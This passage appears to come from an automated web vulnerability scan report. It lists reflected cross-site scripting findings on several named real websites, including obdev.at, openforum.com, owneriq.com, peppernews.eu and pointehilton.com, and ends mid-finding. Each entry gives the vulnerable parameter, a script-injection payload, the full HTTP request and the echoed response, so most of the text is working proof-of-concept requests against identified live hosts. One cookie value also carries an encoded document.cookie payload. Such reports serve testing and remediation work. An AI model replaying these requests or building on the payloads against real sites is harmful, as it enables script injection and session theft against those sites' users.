HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:46 GMT Vary: Accept-Encoding Content-Length: 3897 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
4.328. http://www.obdev.at/products/pebbles/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.obdev.at
Path: /products/pebbles/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 23a09'><script>alert(1)</script>73bda44d8f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/pebbles/index.html?23a09'><script>alert(1)</script>73bda44d8f5=1 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:09:44 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Last-Modified: Sun, 06 Feb 2011 16:09:44 GMT Vary: Accept-Encoding Content-Length: 6722 Connection: close Content-Type: text/html X-Pad: avoid browser bug
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Pebbles - The Quick In Between Color Matching Game for t ...[SNIP]... <a href='/products/pebbles/index-de.html?23a09'><script>alert(1)</script>73bda44d8f5=1'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57505'><script>alert(1)</script>04483c897d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products57505'><script>alert(1)</script>04483c897d4/sharity/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:45 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:45 GMT Vary: Accept-Encoding Content-Length: 3903 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 14624'><script>alert(1)</script>44f6ac9b7e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/sharity14624'><script>alert(1)</script>44f6ac9b7e9/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:46 GMT Vary: Accept-Encoding Content-Length: 3903 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9094d'><script>alert(1)</script>36fbf9ed792 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/sharity/index.html9094d'><script>alert(1)</script>36fbf9ed792 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:09:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:09:46 GMT Vary: Accept-Encoding Content-Length: 3897 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
4.332. http://www.obdev.at/products/sharity/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.obdev.at
Path: /products/sharity/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 97b46'><script>alert(1)</script>10085725898 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/sharity/index.html?97b46'><script>alert(1)</script>10085725898=1 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:09:45 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Last-Modified: Sun, 06 Feb 2011 16:09:45 GMT Vary: Accept-Encoding Content-Length: 7581 Connection: close Content-Type: text/html X-Pad: avoid browser bug
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Sharity 3 - SMBFS for Unix</title>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2519c'><script>alert(1)</script>6aa8a9631c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products2519c'><script>alert(1)</script>6aa8a9631c1/webyep/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:12:42 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:12:42 GMT Vary: Accept-Encoding Content-Length: 3901 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5f14f'><script>alert(1)</script>0ab5160bb6b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/webyep5f14f'><script>alert(1)</script>0ab5160bb6b/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:12:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:12:43 GMT Vary: Accept-Encoding Content-Length: 3901 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2e8c1'><script>alert(1)</script>badd922506b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/webyep/index.html2e8c1'><script>alert(1)</script>badd922506b HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:12:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:12:43 GMT Vary: Accept-Encoding Content-Length: 3895 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
4.336. http://www.obdev.at/products/webyep/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.obdev.at
Path: /products/webyep/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5a771'><script>alert(1)</script>f5d360894ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/webyep/index.html?5a771'><script>alert(1)</script>f5d360894ff=1 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:12:20 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Last-Modified: Sun, 06 Feb 2011 16:12:20 GMT Vary: Accept-Encoding Content-Length: 7890 Connection: close Content-Type: text/html X-Pad: avoid browser bug
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>WebYep - The Shiny Tiny WebCMS</title>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e04dd'><script>alert(1)</script>ea6efcccaa5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shope04dd'><script>alert(1)</script>ea6efcccaa5/index.html HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:13:01 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:13:01 GMT Vary: Accept-Encoding Content-Length: 3879 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90ee7'><script>alert(1)</script>bb025998b09 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/index.html90ee7'><script>alert(1)</script>bb025998b09 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:13:03 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Status: 404 Not Found Last-Modified: Sun, 06 Feb 2011 16:13:03 GMT Vary: Accept-Encoding Content-Length: 3873 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development</title>
4.339. http://www.obdev.at/shop/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.obdev.at
Path: /shop/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8fb4a'><script>alert(1)</script>d64454b2502 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /shop/index.html?8fb4a'><script>alert(1)</script>d64454b2502=1 HTTP/1.1 Host: www.obdev.at Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:12:42 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Last-Modified: Sun, 06 Feb 2011 16:12:42 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 20921
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Objective Development - Shop</title>
4.340. http://www.openforum.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.openforum.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7979f'-alert(1)-'12735a7cb12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?7979f'-alert(1)-'12735a7cb12=1 HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sat, 05 Feb 2011 22:07:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:07:19 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2819336384.20480.0000; path=/ Content-Length: 102157
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6e25'-alert(1)-'cbfdf312a0e was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cid=inav_homeb6e25'-alert(1)-'cbfdf312a0e&inav=menu_business_openforum HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Sat, 05 Feb 2011 22:07:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:07:23 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2819336384.20480.0000; path=/ Content-Length: 102008
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the inav request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca69b'-alert(1)-'084dfeb0ca8 was submitted in the inav parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cid=inav_home&inav=menu_business_openforumca69b'-alert(1)-'084dfeb0ca8 HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Sat, 05 Feb 2011 22:07:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:07:29 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2735450304.20480.0000; path=/ Content-Length: 102388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
4.343. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.openforum.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f270e'-alert(1)-'17ac5158bd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?f270e'-alert(1)-'17ac5158bd9=1 HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Sat, 05 Feb 2011 22:07:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:07:19 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2852890816.20480.0000; path=/ Content-Length: 101826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
4.344. http://www.owneriq.com/manuals-online [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.owneriq.com
Path: /manuals-online
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a4b1"><script>alert(1)</script>18871e2d338 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /manuals-online?4a4b1"><script>alert(1)</script>18871e2d338=1 HTTP/1.1 Host: www.owneriq.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=46970937.1296942892.1.1.utmcsr=homeappliance.manualsonline.com|utmccn=(referral)|utmcmd=referral|utmcct=/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem; __utma=46970937.805338756.1296942892.1296942892.1296942892.1; __avc_31021=f64d-6178-34ed-5f2e12df7d201ca; __utmc=46970937; __utmb=46970937.1.10.1296942892; __alh_31021=http%3A//www.owneriq.com/ownership-targeting%3Fsrc%3D728x90_blue;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:33:02 GMT Server: Apache/2.2.6 (Fedora) X-Powered-By: PHP/5.2.6 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 30208
4.345. http://www.owneriq.com/mostiq [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.owneriq.com
Path: /mostiq
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7adc9"><script>alert(1)</script>31e937516d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mostiq?7adc9"><script>alert(1)</script>31e937516d5=1 HTTP/1.1 Host: www.owneriq.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=46970937.1296942892.1.1.utmcsr=homeappliance.manualsonline.com|utmccn=(referral)|utmcmd=referral|utmcct=/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem; __utma=46970937.805338756.1296942892.1296942892.1296942892.1; __avc_31021=f64d-6178-34ed-5f2e12df7d201ca; __utmc=46970937; __utmb=46970937.1.10.1296942892; __alh_31021=http%3A//www.owneriq.com/ownership-targeting%3Fsrc%3D728x90_blue;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:33:02 GMT Server: Apache/2.2.6 (Fedora) X-Powered-By: PHP/5.2.6 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27803
4.346. http://www.peppernews.eu/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.peppernews.eu
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7d65"><script>alert(1)</script>f6336f06cd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d7d65"><script>alert(1)</script>f6336f06cd4=1 HTTP/1.1 Host: www.peppernews.eu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:11:16 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Set-Cookie: PHPSESSID=vd9g8hf893cbm16bpk18sfk1sfprvdrp; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 75749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <input type="hidden" name="return" value="/?d7d65"><script>alert(1)</script>f6336f06cd4=1" /> ...[SNIP]...
4.347. http://www.pointehilton.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pointehilton.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e6b8"><script>alert(1)</script>9146d6140e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?1e6b8"><script>alert(1)</script>9146d6140e3=1 HTTP/1.1 Host: www.pointehilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=16197162;expires=Mon, 28-Jan-2041 22:09:27 GMT;path=/ Set-Cookie: CFTOKEN=56010509;expires=Mon, 28-Jan-2041 22:09:27 GMT;path=/ Content-Type: text/html; charset=UTF-8 Set-Cookie: BIGipServerIMS-6=773065226.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <link rel="canonical" href="http://www.pointehilton.com/index.cfm?1e6b8"><script>alert(1)</script>9146d6140e3=1" > ...[SNIP]...
4.348. http://www.pointehilton.com/404.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pointehilton.com
Path: /404.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1761c"><script>alert(1)</script>df41c02bb48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /404.cfm?1761c"><script>alert(1)</script>df41c02bb48=1 HTTP/1.1 Host: www.pointehilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296936876900:ss=1296936876900; CFTOKEN=78240628; __utmz=69452433.1296944075.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; CFID=16197269; __utma=69452433.16251013.1296944075.1296944075.1296944075.1; BIGipServerIMS-6=773065226.20480.0000; __utmc=69452433; __utmb=69452433.1.10.1296944075;
Response
HTTP/1.1 404 Not Found Connection: close Date: Sat, 05 Feb 2011 22:40:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <link rel="canonical" href="http://www.pointehilton.com/404.cfm?1761c"><script>alert(1)</script>df41c02bb48=1" > ...[SNIP]...
4.349. http://www.pointehilton.com/awards/index.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pointehilton.com
Path: /awards/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7011e"><script>alert(1)</script>c1cb4f5731 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /awards/index.cfm?7011e"><script>alert(1)</script>c1cb4f5731=1 HTTP/1.1 Host: www.pointehilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296936876900:ss=1296936876900; CFTOKEN=78240628; __utmz=69452433.1296944075.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; CFID=16197269; __utma=69452433.16251013.1296944075.1296944075.1296944075.1; BIGipServerIMS-6=773065226.20480.0000; __utmc=69452433; __utmb=69452433.1.10.1296944075;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 16:11:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <link rel="canonical" href="http://www.pointehilton.com/awards/index.cfm?7011e"><script>alert(1)</script>c1cb4f5731=1" > ...[SNIP]...
4.350. http://www.pointehilton.com/contact/index.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pointehilton.com
Path: /contact/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd987"><script>alert(1)</script>09d3033758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
